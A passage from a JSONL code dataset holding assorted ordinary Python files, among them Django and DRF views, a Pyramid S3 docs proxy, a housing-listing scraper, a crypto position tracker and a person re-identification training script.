\"POST\":\n        search_text = request.POST['search_text']\n    else:\n        search_text = 'Cabiria'\n    \n    mdatas = Mdata.objects.filter(name__contains=search_text)\n    \n    return render_to_response('ajax_search.html', {'mdatas' : mdatas})","sub_path":"movies/mdata/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"582677961","text":"x = [0.30, 0.60, 0.10]\ny = [0.40, 0.10, 0.50]\n\ntotal = 0\nfor i in range(len(x)):\n    total += x[i]*y[i]\nprint(total)\n\nn = len(x)\nprint(x)\nfor i in range(n // 2):\n    temp = x[i]\n    x[i] = x[n-1-i]\n    x[n-1-i] = temp\nprint(x)\n\n# iterating over the elements in an array in a[] without\n# referring to the indices explicitly. 
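The first loop in the array.py record is an index-based dot product; the zip form computes the same value without touching indices:

```python
x = [0.30, 0.60, 0.10]
y = [0.40, 0.10, 0.50]
print(sum(a * b for a, b in zip(x, y)))  # 0.23 (up to float rounding)
```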
\ntotal = 0\nfor v in y:\n    total += v\naverage = total / len(y)\nprint(average)\n\nprint()\nprint(y)\nprint(sum(y))\n\n\n# Create arrays in Python\na = []\nfor i in range(n):\n    a += [0.0]\n    \na = [0.0]*3\n\n","sub_path":"introCS/python/array.py","file_name":"array.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"541447937","text":"\"\"\"\n    Chapter 4: Trees and Graph\n    Question 2: Minimal Tree\n\"\"\"\n\nimport networkx as nx\nimport pdb\nimport random\nfrom collections import defaultdict\nimport matplotlib.pyplot as plt\n\nclass TreeNode:\n    def __init__(self, val):\n        self.value = val\n        self.left = None\n        self.right = None\n\ndef build_bst(array):\n    n = len(array)\n    if n == 0:\n        return None\n    middle = n//2\n    node = TreeNode(array[middle])\n    node.left = build_bst(array[:middle])\n    node.right = build_bst(array[middle+1:])\n    return node\n\ndef graph_from_tree(node, graph):\n    if node:\n        if not graph:\n            graph = defaultdict(set)\n        if node.left:\n            graph[node.value].add(node.left.value)\n            graph_from_tree(node.left, graph)\n        if node.right:\n            graph[node.value].add(node.right.value)\n            graph_from_tree(node.right, graph)\n    return graph\n\ndef visualise_graph(graph):\n    G = nx.Graph()\n    for source in graph:\n        for target in graph[source]:\n            G.add_edges_from([(source, target)])\n    nx.draw(G, with_labels=True, node_color=\"red\")\n    plt.axis('off')\n    plt.show()\n\nif __name__ == \"__main__\":\n    array = [i for i in range(2**4-1)]\n    tree = build_bst(array)\n    graph = graph_from_tree(tree, None)\n    visualise_graph(graph)\n","sub_path":"Chapter04/02_MinimalTree/minimal_tree.py","file_name":"minimal_tree.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"593859497","text":"from django.conf.urls import url\n\nfrom . 
import views\n\nurlpatterns = [\n\turl(r'^reminders/list/$', views.reminders_list, name='reminders_list'),\n\turl(r'^reminder/(?P<id>[\\d]+)/$', views.reminder_item, name='reminder_item'),\n\n\turl(r'^add/reminder/$', views.add_reminder, name='add_reminder'),\n\turl(r'^edit/reminder/(?P<id>[\\d]+)/$', views.edit_reminder, name='edit_reminder'),\n\turl(r'^additional/reminder/(?P<id>[\\d]+)/$', views.additional_reminder, name='additional_reminder'),\n\turl(r'^delete/reminder/(?P<id>[\\d]+)/$', views.delete_reminder, name='delete_reminder'),\n\n\turl(r'^notification/reminders/$', views.notification_reminders, name='notification_reminders'),\n]\n","sub_path":"apps/reminders/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"37225854","text":"# coding: utf-8\nfrom django.shortcuts import render, get_object_or_404\n\n# Create your views here.\nfrom marketing.forms import EmailForm\nfrom marketing.models import MarketingMessage, Slider\n\nfrom .models import Product,ProductImage\n\n# search box\ndef search(request):\n\t# print request first to inspect its shape, then write the lookup from it\n\t# was anything searched for?\n\ttry:\n\t\tq = request.GET.get('q')\n\texcept:\n\t\tq = None\n\t# if so\n\tif q:\n\t\tproducts = Product.objects.filter(title__icontains=q)  # title__icontains matches anywhere inside title\n\t\ttemplate = 'products/results.html'\n\t\tcontext = {'query': q, 'products': products }\n\telse:\n\t\ttemplate = 'products/home.html'\n\t\tcontext = {}\n\treturn render(request, template, context)\n\n# home page\ndef home(request):\n\tsliders = Slider.objects.all_featured()  # provided via objects = MarketingManager() on the Slider model\n\tproducts = Product.objects.all()\n\ttemplate = 'products/home.html'\n\tcontext = {\n\t\t'products': products,\n\t\t'sliders': sliders,\n\t\t}\n\treturn render(request, template, context)\n\n# all products\ndef all(request):\n\tproducts = Product.objects.all()\n\ttemplate = 'products/all.html'\n\tcontext = {'products': products}\n\treturn render(request, template, context)\n\n# detail page for a single product\ndef single(request, slug):\n\tproduct = get_object_or_404(Product, slug=slug)  # raise a 404 page if missing, otherwise get it\n\timages = ProductImage.objects.filter(product=product)  # equivalent to images = product.productimage_set.all()\n\ttemplate = 'products/single.html'\n\tcontext = {'product': product, 'images': images }\n\treturn render(request, template, context)","sub_path":"src/products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"377099202","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\n\n\n# In this class, the files are .npy files stored with numpy ndarray\n# Note that there is no class_num\nclass attrdataset(object):\n\tdef __init__(self, train_file_name, val_file_name, test_file_name):\n\t\tself.train_X = self.get_X(train_file_name)\n\t\tself.val_X = self.get_X(val_file_name)\n\t\tself.test_X = self.get_X(test_file_name)\n\n\n\tdef get_X(self, file_name):\n\t\tX = np.load(file_name)\n\t\treturn X.astype(np.float32)\n\n\n\t\"\"\"\n\tdef initialize_batch(self):\n\t\tpass\n\t\"\"\"\n\n\n\t# Assert: there is next batch\n\tdef next_batch(self, dataset_name, index_vector):\n\t\tif dataset_name == \"train\" or dataset_name == \"train_init\":\n\t\t\toutput_X = self.train_X[index_vector, :]\n\t\telif dataset_name == 
\"val\":\n\t\t\toutput_X = self.val_X[index_vector, :]\n\t\telif dataset_name == \"test\":\n\t\t\toutput_X = self.test_X[index_vector, :]\n\n\t\treturn output_X\n","sub_path":"code/archive/attrdataset.py","file_name":"attrdataset.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"49767819","text":"import mimetypes\nimport os\n\nfrom boto.exception import S3ResponseError\nfrom boto.s3.connection import S3Connection\nfrom pyramid.config import Configurator\nfrom pyramid.httpexceptions import HTTPMovedPermanently, HTTPNotFound\nfrom pyramid.response import Response, FileIter\nfrom tomb_routes import simple_route\n\n\n@simple_route(\"/{path:.*}\")\ndef my_route(request, path):\n if not path:\n path = \"/\"\n\n if path.endswith(\"/\"):\n path += \"index.html\"\n\n try:\n key = request.s3.get_key(path)\n except S3ResponseError:\n # Try the same request, but with a /index.html added onto it.\n try:\n key = request.s3.get_key(path + \"/index.html\")\n except S3ResponseError:\n return HTTPNotFound()\n else:\n return HTTPMovedPermanently(\"/\" + path + \"/\")\n\n key.open_read()\n content_type, content_encoding = mimetypes.guess_type(path)\n\n return Response(\n app_iter=key,\n content_type=content_type,\n content_encoding=content_encoding,\n )\n\n\ndef _get_bucket(request):\n conn = request.registry.s3_conn\n bucket = conn.get_bucket(request.registry.s3_bucket, validate=False)\n return bucket\n\n\nconfig = Configurator()\nconfig.registry.s3_conn = S3Connection(anon=True)\nconfig.registry.s3_bucket = os.environ[\"DOCS_PROXY_BUCKET\"]\nconfig.add_request_method(_get_bucket, name=\"s3\", reify=True)\nconfig.scan()\n\napplication = config.make_wsgi_app()\n","sub_path":"docs_proxy.py","file_name":"docs_proxy.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"534755661","text":"'''/*---------------------------------------------------------------------------------------------\n * Copyright (c) VituTech. All rights reserved.\n * Licensed under the Apache License 2.0. 
See License.txt in the project root for license information.\n *--------------------------------------------------------------------------------------------*/\n'''\nimport datetime\nimport numpy as np\n\nfrom vitu.trade.position.position import Position\nfrom vitu.utils.date_utils import str2timestamp\n\n\nclass SpotPosition(Position):\n    # __slots__ = [\n    #     'available',\n    #     'frozen',\n    #     '_context'\n    # ]\n    def __init__(self, asset_class=None, asset=None, available=0, frozen=0, avg_cost_btc=0, avg_cost_usdt=0):\n        \"\"\"\n        :param asset_class: 'spot'/'contract'\n        :param asset: 'btc'/'eth' ...\n        :param available: quantity available for trading\n        :param frozen: quantity frozen in open orders\n        :param avg_cost_btc: average position cost denominated in BTC\n        :param avg_cost_usdt: average position cost denominated in USDT\n        \"\"\"\n        super(SpotPosition, self).__init__(asset_class, asset)\n        self.available = available\n        self.frozen = frozen\n        self.avg_cost_btc = avg_cost_btc\n        self.avg_cost_usdt = avg_cost_usdt  # TODO: where does the None come from\n\n        self._context = None\n\n    @property\n    def context(self):\n        return self._context\n\n    @context.setter\n    def context(self, context):\n        self._context = context\n\n    @property\n    def value(self):\n        \"\"\"\n        :return: market value of the position (moves with the live market price)\n        \"\"\"\n        if not self._context:\n            return 0\n        else:\n            date = self._context.clock.current_date\n            current_timestamp = str2timestamp(str(date.date()))  # keep only date(), drop time()\n            # current_timestamp = datetime.datetime.timestamp(date)\n            cmc_key = 'cmc-spot-' + self.asset + 'usd'\n            df = self.context.cacher.data[cmc_key]\n            return df.loc[(df['timestamp'] == current_timestamp)]['close'].tolist()[0]\n\n    @property\n    def total(self):\n        \"\"\"\n        :return: total quantity (available + frozen)\n        \"\"\"\n        if not self.available + self.frozen:\n            return 0\n        else:\n            return self.available + self.frozen\n    @property\n    def amount(self):\n        \"\"\"\n        :return: floating value of the position (moves with the live market price)\n        \"\"\"\n        if not self.value:\n            return 0\n        else:\n            return self.total * self.value\n\n    def order_update(self, currency_type, side, price, qty):\n        \"\"\"\n        :param currency_type: base/quote (base currency / quote currency)\n        :param side: buy/sell\n        :param price: price\n        :param qty: quantity\n        \"\"\"\n        if side == 'buy':\n            if currency_type == 'quote':\n                self.available -= price * qty\n                self.frozen += price * qty\n        if side == 'sell':\n            if currency_type == 'base':\n                self.available -= qty\n                self.frozen += qty\n\n    def trade_update(self, currency_type, trade):\n        \"\"\"\n        {\n\t    'id': '69327ec1-ea66-11e9-bea1-005056c00008',\n\t    'order_id': '69327ec0-ea66-11e9-8746-005056c00008',\n\t    'side': 'buy',\n\t    'price': 3432.88,\n\t    'qty': 145.65029,\n\t    'amount': 499999.967535,\n\t    'commission': 0.02913,\n\t    'create_time': '2018-12-10 00:00:00'\n\t    }\n        :param currency_type: 'base'/'quote' (base currency / quote currency)\n        :param trade: instance\n        :param relative_currency: the other currency of the symbol\n        \"\"\"\n        # btc_usdt\n        if trade['side'] == 'buy':\n            if currency_type == 'base':\n                self.available += (trade['qty'] - trade['commission'])\n                # self.available += trade['qty']\n            elif currency_type == 'quote':\n                self.frozen -= trade['price']*trade['qty']\n\n        if trade['side'] == 'sell':\n            if currency_type == 'base':\n                self.frozen -= trade['qty']\n            elif currency_type == 'quote':\n                self.available += (trade['price']*trade['qty']-trade['commission'])\n                # self.available += trade['price']*trade['qty']\n\n    def trade_update_cost(self, currency_type, trade, relative_currency):\n        if not self.available:\n            self.avg_cost_btc = 0\n            self.avg_cost_usdt = 0\n            return\n        if trade['side'] == 'buy':\n            if currency_type == 'base':\n                self.avg_cost_btc = ((self.available-trade['qty']+trade['commission']) * self.avg_cost_btc +\n                                     (relative_currency.avg_cost_btc * trade['amount'])) / self.available
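\n                # Same weighted-average update as the BTC line above, but in USDT:\n                # new_avg = (prev_qty*prev_avg + counter_avg*traded_amount) / new_qty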
\n                self.avg_cost_usdt = ((self.available-trade['qty']+trade['commission']) * self.avg_cost_usdt +\n                                      (relative_currency.avg_cost_usdt * trade['amount'])) / self.available\n            elif currency_type == 'quote':\n                self.avg_cost_btc = self.avg_cost_btc\n                self.avg_cost_usdt = self.avg_cost_usdt\n        if trade['side'] == 'sell':\n            if currency_type == 'base':\n                self.avg_cost_btc = self.avg_cost_btc\n                self.avg_cost_usdt = self.avg_cost_usdt\n            elif currency_type == 'quote':\n                self.avg_cost_btc = ((self.available-trade['amount']+trade['commission']) * self.avg_cost_btc +\n                                     (relative_currency.avg_cost_btc * trade['qty'])) / self.available\n                self.avg_cost_usdt = ((self.available-trade['amount']+trade['commission']) * self.avg_cost_usdt +\n                                      (relative_currency.avg_cost_usdt * trade['qty'])) / self.available\n\n    def detail(self):\n        return {\n            'asset_class':self.asset_class,\n            'asset':self.asset,\n            'amount':round(self.amount, 6),\n            'value':round(self.value, 6),\n            'total':round(self.total, 6),\n            'available':round(self.available, 6),\n            'frozen':self.frozen,\n\n            'avg_cost_btc':self.avg_cost_btc,\n            'avg_cost_usdt':self.avg_cost_usdt\n        }\n\n    def to_dict(self):\n        return {\n            'asset': self.asset,\n            'available': round(self.available, 6),\n            'frozen': self.frozen,\n\n            'avg_cost_btc': self.avg_cost_btc,\n            'avg_cost_usdt': self.avg_cost_usdt\n        }\n\n    def __repr__(self):\n        return \"SpotPosition(asset_class: {}, asset: {}, amount: {}, value: {}, total: {}, available: {}, frozen: {}, \" \\\n               \"avg_cost_btc: {}, avg_cost_usdt: {})\".format(\n            self.asset_class, self.asset, round(self.amount, 4), round(self.value, 4), round(self.total, 4),\n            round(self.available, 4), self.frozen, self.avg_cost_btc, self.avg_cost_usdt)","sub_path":"vitu/trade/position/spot_position.py","file_name":"spot_position.py","file_ext":"py","file_size_in_byte":6734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"154710166","text":"from sys import argv\nimport os\n\nif len(argv) < 3:\n    print('Fatal: you forgot to enter an argument.')\n    raise SystemExit(1)\n\nscript, filename, second = argv\n\nif not os.access(filename, os.F_OK):\n    print('No such file')\n    raise SystemExit(1)\ntxt = open(filename)\n\nfor row in txt:\n    if \"COMPLETED\" in row:\n        words = row.split()\n        a = words[-1]\n        c = float(a)\n        b = float(second)\n        if c > b:\n            print(c)\n    \n","sub_path":"log39.py","file_name":"log39.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"464667647","text":"from bs4 import BeautifulSoup\nimport Utils\nimport re\nfrom Constants import *\n\n\ndef parse_baths_string(baths_text):\n    sections = baths_text.split(', ')\n    num_halfs = []\n    if len(sections) > 1:\n        num_halfs_string = sections[1]\n        num_halfs = [int(re.search(r'\\d+', num_halfs_string).group())]\n\n    num_fulls_string = sections[0]\n    num_fulls = [int(re.search(r'\\d+', num_fulls_string).group())]\n    if len(num_halfs) > 0:\n        num_baths = num_fulls[0] + num_halfs[0] / 2\n    else:\n        num_baths = num_fulls[0]\n    return num_baths\n\n\ndef files_to_json(today, file_array):\n\n    number_of_listings = 0\n    json_file_array = []\n\n    for homefinderFile in file_array:\n\n        # Create a list of dictionaries for JSON Object\n        response = []\n\n        # Prepare for parsing file with BeautifulSoup\n        soup_homefinder_file = BeautifulSoup(open(HOMEFINDER_HTML_DIR + homefinderFile), 'lxml')\n\n        # Parse Homefinder file\n        # each 'propertyDescription' div marks one house listing card in the html;\n        # every other field is found in its relationship to that card.
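\n        # Each field below is carved out with two plain string splits: one on a\n        # marker before the value, one on the text after it, e.g. (made-up value)\n        #   'class=\"price\"> $250,000 <'  ->  split twice  ->  '250,000'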
\n        for things in soup_homefinder_file.findAll('div', attrs={'class': 'propertyDescription'}):\n\n            to_search = str(things)\n\n            price_test = to_search.split('class=\"price\"> $')\n            if len(price_test) > 1:\n                price_key = to_search.split('class=\"price\"> $')[1]\n                price = price_key.split(' <')[0]\n            else:\n                price = \"\"\n\n            url_test = to_search.split('href=\"')\n            if len(url_test) > 1:\n                url_key = to_search.split('href=\"')[1]\n                property_url = url_key.split('\" item')[0]\n            else:\n                property_url = \"\"\n\n            zip_test = to_search.split('cityStZip\"> Nashville, TN ')\n            if len(zip_test) > 1:\n                zip_key = to_search.split('cityStZip\"> Nashville, TN ')[1]\n                zip_code = zip_key.split(' <')[0]\n            else:\n                zip_code = \"\"\n\n            street_test = to_search.split('meta content=\"')\n            if len(street_test) > 1:\n                street_key = to_search.split('meta content=\"')[1]\n                street_address = street_key.split('\"')[0]\n            else:\n                street_address = \"\"\n\n            beds_test = to_search.split('class=\"beds\">')\n            if len(beds_test) > 1:\n                beds_key = to_search.split('class=\"beds\">')[1]\n                beds_num = beds_key.split(' Beds')[0]\n                beds = str(beds_num)\n            else:\n                beds = \"\"\n\n            baths_test = to_search.split('class=\"baths\">')\n            if len(baths_test) > 1:\n                baths_key = to_search.split('class=\"baths\">')[1]\n                baths_text = baths_key.split('</span>')[0]\n                baths_num = parse_baths_string(baths_text)\n                baths = str(baths_num)\n            else:\n                baths = \"\"\n\n            square_feet = \"\"\n\n            source = \"Homefinder\"\n\n            # Make changes to response for each listing\n            json_item = Utils.make_housing_json_object(street_address,\n                                                       zip_code,\n                                                       price,\n                                                       beds,\n                                                       baths,\n                                                       square_feet,\n                                                       property_url,\n                                                       source,\n                                                       today)\n            response.append(json_item)\n            number_of_listings += 1\n\n        # Write response to JSON file\n        plain_filename = homefinderFile.replace('.html', '.json')\n        Utils.write_json_to_file(HOMEFINDER_JSON_DIR, plain_filename, response)\n        json_file_array.append(HOMEFINDER_JSON_DIR + plain_filename)\n\n    print(\"Number of Homefinder listings converted to json: \" + str(number_of_listings))\n    return json_file_array\n","sub_path":"WebProject_nsottek/HomefinderToJson.py","file_name":"HomefinderToJson.py","file_ext":"py","file_size_in_byte":4100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"511896769","text":"\"\"\"\n    This is the custom function interface.\n    You should not implement it, or speculate about its implementation\n\"\"\"\n\n\nclass CustomFunction:\n    # Returns f(x, y) for any given positive integers x and y.\n    # Note that f(x, y) is increasing with respect to both x and y.\n    # i.e. 
f(x, y) < f(x + 1, y), f(x, y) < f(x, y + 1)\n    def f(self, x, y):\n\n        return x+y\n\n\nclass Solution:\n    def findSolution(self, customfunction: 'CustomFunction', z: int) -> list[list[int]]:\n        # Method 1: nested loops, O(n*n) time\n        # ls = []\n        # for x in range(1,1001):\n        #     if customfunction.f(x, 1) > z:\n        #         break\n        #     for y in range(1,1001):\n        #         ans = customfunction.f(x, y)\n        #         if ans == z:\n        #             ls.append([x, y])\n        #         if ans > z:\n        #             break\n        # return ls\n\n        # Method 2: two pointers, O(n) time\n        ls = []\n        left = 1\n        right = 1000\n        while left <= 1000 and right >= 1:\n            tmp = customfunction.f(left,right)\n            if tmp == z:\n                ls.append([left, right])\n                left += 1\n            elif tmp > z:\n                right -= 1\n            else:\n                left += 1\n        return ls\n\n\na = Solution()\nb = CustomFunction()\na.findSolution(b, 5)\n","sub_path":"src/找出给定方程的正整数解.py","file_name":"找出给定方程的正整数解.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"487864594","text":"from __future__ import print_function, absolute_import\nimport argparse\nimport os.path as osp\n\nimport numpy as np\nimport sys\nimport torch\n\nfrom torch import nn\nfrom torch.backends import cudnn\nfrom torch.utils.data import DataLoader\n\nfrom reid import datasets\nfrom reid import models\nfrom reid.trainers import Trainer, CamStyleTrainer\nfrom reid.evaluators import Evaluator\nfrom reid.utils.data import transforms as T\nfrom reid.utils.data.preprocessor import Preprocessor\nfrom reid.utils.logging import Logger\nfrom reid.utils.data.sampler import RandomIdentitySampler\nfrom reid.utils.serialization import load_checkpoint, save_checkpoint\nfrom reid.loss import TripletLoss, NewTripletLoss\n\n\ndef get_data(dataname, data_dir, height, width, batch_size, camstyle=0, re=0, num_instances=4, workers=8):\n    root = osp.join(data_dir, dataname)\n\n    dataset = datasets.create(dataname, root)\n\n    normalizer = T.Normalize(mean=[0.485, 0.456, 0.406],\n                             std=[0.229, 0.224, 0.225])\n\n    num_classes = dataset.num_train_ids\n\n    train_transformer = T.Compose([\n        T.RandomSizedRectCrop(height, width),\n        T.RandomHorizontalFlip(),\n        T.ToTensor(),\n        normalizer,\n        T.RandomErasing(EPSILON=re),\n    ])\n\n    test_transformer = T.Compose([\n        T.RectScale(height, width),\n        T.ToTensor(),\n        normalizer,\n    ])\n\n    train_loader = DataLoader(\n        Preprocessor(dataset.train, root=osp.join(dataset.images_dir, dataset.train_path),\n                     transform=train_transformer),\n        batch_size=batch_size, num_workers=workers,\n        sampler=RandomIdentitySampler(dataset.train, num_instances),\n        pin_memory=True, drop_last=True)\n\n    query_loader = DataLoader(\n        Preprocessor(dataset.query,\n                     root=osp.join(dataset.images_dir, dataset.query_path), transform=test_transformer),\n        batch_size=batch_size, num_workers=workers,\n        shuffle=False, pin_memory=True)\n\n    gallery_loader = DataLoader(\n        Preprocessor(dataset.gallery,\n                     root=osp.join(dataset.images_dir, dataset.gallery_path), transform=test_transformer),\n        batch_size=batch_size, num_workers=workers,\n        shuffle=False, pin_memory=True)\n\n    return dataset, num_classes, train_loader, query_loader, gallery_loader\n\n\ndef main(args):\n    cudnn.benchmark = True\n    # Redirect print to both console and log file\n    if not args.evaluate:\n        sys.stdout = Logger(osp.join(args.logs_dir, 'log.txt'))\n\n    # Create data loaders\n    dataset, num_classes, train_loader, query_loader, gallery_loader = \\\n        get_data(args.dataset, args.data_dir, args.height,\n                 args.width, args.batch_size, args.camstyle, args.re, args.num_instances, args.workers)\n\n    # Create model\n    model = 
models.create(args.arch, num_features=2048,\n dropout=args.dropout, num_classes=args.features)\n\n # Load from checkpoint\n start_epoch = 0\n if args.resume:\n checkpoint = load_checkpoint(args.resume)\n model.load_state_dict(checkpoint['state_dict'])\n start_epoch = checkpoint['epoch']\n print(\"=> Start epoch {} \"\n .format(start_epoch))\n model = nn.DataParallel(model).cuda()\n\n # Evaluator\n evaluator = Evaluator(model)\n if args.evaluate:\n print(\"Test:\")\n evaluator.evaluate(query_loader, gallery_loader, dataset.query, dataset.gallery, args.output_feature, args.rerank)\n return\n\n # Criterion\n # criterion = TripletLoss(margin=args.margin).cuda()\n criterion_cro = nn.CrossEntropyLoss().cuda()\n criterion_tri = TripletLoss(margin=args.margin).cuda()\n # Optimizer\n optimizer = torch.optim.Adam(model.parameters(), lr=args.lr,\n weight_decay=args.weight_decay)\n\n # Trainer\n trainer = Trainer(model, criterion_cro, criterion_tri)\n\n # Schedule learning rate\n def adjust_lr(epoch):\n lr = args.lr if epoch <= 100 else \\\n args.lr * (0.001 ** ((epoch - 100) / 50.0))\n for g in optimizer.param_groups:\n g['lr'] = lr * g.get('lr_mult', 1)\n\n # Start training\n for epoch in range(start_epoch, args.epochs):\n adjust_lr(epoch)\n trainer.train(epoch, train_loader, optimizer)\n\n save_checkpoint({\n 'state_dict': model.module.state_dict(),\n 'epoch': epoch + 1,\n }, fpath=osp.join(args.logs_dir, 'checkpoint.pth.tar'))\n\n print('\\n * Finished epoch {:3d} \\n'.\n format(epoch))\n\n # Final test\n print('Test with best model:')\n evaluator = Evaluator(model)\n evaluator.evaluate(query_loader, gallery_loader, dataset.query, dataset.gallery, args.output_feature, args.rerank)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"CamStyle\")\n # data\n parser.add_argument('-d', '--dataset', type=str, default='market',\n choices=datasets.names())\n parser.add_argument('-b', '--batch-size', type=int, default=32)\n parser.add_argument('-j', '--workers', type=int, default=8)\n parser.add_argument('--height', type=int, default=256,\n help=\"input height, default: 256\")\n parser.add_argument('--width', type=int, default=128,\n help=\"input width, default: 128\")\n # model\n parser.add_argument('-a', '--arch', type=str, default='resnet50',\n choices=models.names())\n parser.add_argument('--features', type=int, default=128)\n parser.add_argument('--dropout', type=float, default=0)\n # optimizer\n parser.add_argument('--lr', type=float, default=0.0002)\n parser.add_argument('--momentum', type=float, default=0.9)\n parser.add_argument('--weight-decay', type=float, default=5e-4)\n # training configs\n parser.add_argument('--resume', type=str, default='', metavar='PATH')\n parser.add_argument('--evaluate', action='store_true',\n help=\"evaluation only\")\n parser.add_argument('--epochs', type=int, default=150)\n parser.add_argument('--print-freq', type=int, default=1)\n # metric learning\n parser.add_argument('--dist-metric', type=str, default='euclidean')\n # misc\n working_dir = osp.dirname(osp.abspath(__file__))\n parser.add_argument('--data-dir', type=str, metavar='PATH',\n default=osp.join(working_dir, 'data'))\n parser.add_argument('--logs-dir', type=str, metavar='PATH',\n default=osp.join(working_dir, 'logs'))\n parser.add_argument('--output_feature', type=str, default='pool5')\n #random erasing\n parser.add_argument('--re', type=float, default=0)\n # camstyle batchsize\n parser.add_argument('--camstyle', type=int, default=0)\n # perform re-ranking\n 
parser.add_argument('--rerank', action='store_true', help=\"perform re-ranking\")\n\n    parser.add_argument('--num-instances', type=int, default=4,\n                        help=\"each minibatch consist of \"\n                             \"(batch_size // num_instances) identities, and \"\n                             \"each identity has num_instances instances, \"\n                             \"default: 4\")\n    # loss\n    parser.add_argument('--margin', type=float, default=0.3,\n                        help=\"margin of the triplet loss, default: 0.3\")\n    main(parser.parse_args())\n","sub_path":"triplet.py","file_name":"triplet.py","file_ext":"py","file_size_in_byte":7341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"628039904","text":"\"\"\"User Views.\"\"\"\n\n# Django REST Framework\nfrom rest_framework import mixins, status, viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\n\n# Permissions\nfrom rest_framework.permissions import (\n\tAllowAny,\n\tIsAuthenticated\n)\n\n# Serializers\nfrom omnilatam.apps.user.api.serializers import ProfileModelSerializers\nfrom omnilatam.apps.user.api.serializers.user import (\n\tUserModelSerializer,\n\tUserSignUpSerializer,\n\tUserLoginSerializer,\n\tAccountVerificationSerializer\n)\n\n\n# Models\nfrom omnilatam.apps.user.models import User, Profile\n\n# Authenticate\nfrom django.contrib.auth import login, logout\n\n\nclass UserViewSet(mixins.RetrieveModelMixin,\n\t\t\t\t  mixins.UpdateModelMixin,\n\t\t\t\t  viewsets.GenericViewSet):\n\t\"\"\"User view set\n\n\tHandle sign up, login and account verification\n\t\"\"\"\n\n\tqueryset = User.objects.filter(is_active=True)\n\tserializer_class = UserModelSerializer\n\tlookup_field='username'\n\n\n\t@action(detail=False, methods=['post'])\n\tdef login(self, request):\n\t\t\"\"\"User sign in.\"\"\"\n\t\tserializer = UserLoginSerializer(data=request.data)\n\t\tserializer.is_valid(raise_exception=True)\n\t\tuser, token = serializer.save()\n\t\tlogin(request, user)\n\t\tdata = {\n\t\t\t'user':UserModelSerializer(user).data,\n\t\t\t'access_token':token\n\t\t}\n\n\t\treturn Response(data, status=status.HTTP_201_CREATED)\n\t\n\t@action(detail=False, methods=['get'])\n\tdef logout(self, request):\n\t\trequest.user.auth_token.delete()\n\t\tlogout(request)\n\t\treturn Response(status=status.HTTP_200_OK)\n\n\t@action(detail=False, methods=['post'])\n\tdef signup(self, request):\n\t\t\"\"\"User sign up.\"\"\"\n\t\tserializer = UserSignUpSerializer(data=request.data)\n\t\tserializer.is_valid(raise_exception=True)\n\t\tuser = serializer.save()\n\t\tdata = UserModelSerializer(user).data\n\t\treturn Response(data, status=status.HTTP_201_CREATED)\n\n\t@action(detail=False, methods=['post'])\n\tdef verify(self, request):\n\t\t\"\"\"Account verification\"\"\"\n\t\tserializer = AccountVerificationSerializer(data=request.data)\n\t\tserializer.is_valid(raise_exception=True)\n\t\tserializer.save()\n\t\tdata = {'message':'Congratulations, now go and buy anything!'}\n\t\treturn Response(data, status=status.HTTP_200_OK)\n\n\t@action(detail=True, methods=['put', 'patch'])\n\tdef profile(self, request, *args, **kwargs):\n\t\t\"\"\"Update profile data.\"\"\"\n\t\tuser = self.get_object()\n\t\tprofile = user.profile\n\t\tpartial = request.method == 'PATCH'\n\t\tserializer = ProfileModelSerializers(\n\t\t\tprofile,\n\t\t\tdata=request.data,\n\t\t\tpartial=partial\n\t\t)\n\t\tserializer.is_valid(raise_exception=True)\n\t\tserializer.save()\n\t\tdata = UserModelSerializer(user).data\n\t\treturn Response(data, status=status.HTTP_200_OK)\n","sub_path":"apps/user/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"546556346","text":"# -*- coding: utf-8 -*-\nfrom django import template\nfrom django.utils.html import conditional_escape as esc\nfrom django.utils.safestring import mark_safe\n\nfrom apps.oi.models import IssueRevision, states, CTYPES\n\nregister = template.Library()\n\nLANGUAGES=['de']\n\ndef last_updated_issues(parser, token):\n \"\"\"\n Display the last updated indexes as a tag\n token is the content of the tag:\n last_updated_issues language=\n where both number and language are optional\n \"\"\"\n try:\n number = int(token.split_contents()[1].split('=')[1])\n except:\n number = 5\n\n language_in_context = None\n language_code = None\n language_pos = token.contents.find('language')\n if language_pos > 0:\n language_pos += len('language=')\n code = token.contents[language_pos:].lower().strip()\n if code in LANGUAGES: # either a supported language code \n language_code = code\n else: # or the language_code via a template variable\n language_in_context = code\n\n return LastUpdatedNode(number, language_code, language_in_context)\n\n\nclass LastUpdatedNode(template.Node):\n def __init__(self, number, language_code, language_in_context):\n if language_in_context:\n self.language_in_context = template.Variable(language_in_context)\n else:\n self.language_in_context = None\n self.language_code = language_code\n self.number = number\n\n def render(self, context):\n if self.language_in_context:\n try:\n self.language_code = 